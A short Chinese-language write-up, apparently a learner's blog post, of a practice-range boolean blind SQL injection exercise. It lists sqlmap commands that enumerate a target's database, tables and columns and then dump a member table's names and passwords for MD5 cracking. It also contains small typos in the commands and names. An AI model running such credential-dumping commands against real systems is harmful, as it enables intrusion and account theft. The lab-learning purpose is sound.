SQL注入漏洞测试(布尔盲注)
原理还不是很懂,处于懵懵懂懂的状态
1.首先开启靶场环境
因为之前看过很多博客知道这个是个注入点
打开kali使用sqlmap输入sqlmap -u http://219.153.49.288:40866/new_list.php?id=1 --current -db
开始不知道是什么意思
百度是个好东西 bing一下发现current -db是当前数据库的意思
猜测这个就是查询当前数据库的意思
然后就可以看到这个网站的数据库
名字叫做”stormroup“
之后输入sqlmap -u http://219.153.49.288:40866/new_list.php?id=1 -D stormgroup --tables
可以看到这个数据库有两个表分别是member和notice
然后开始爆破member中的数据
输入sqlmap -u http://219.153.49.288:40866/new_list.php?id=1 -D stormgroup -T member --columns之后就可以看到它的列表中有name,password,status 3个
之后就是要得到name 和 passeword 中的数据
输入sqlmap -u http://219.153.49.288:40866/new_list.php?id=1 -D stormgroup -T member -C name,password --dump可以获得两个账号和密码
百度md5在线解密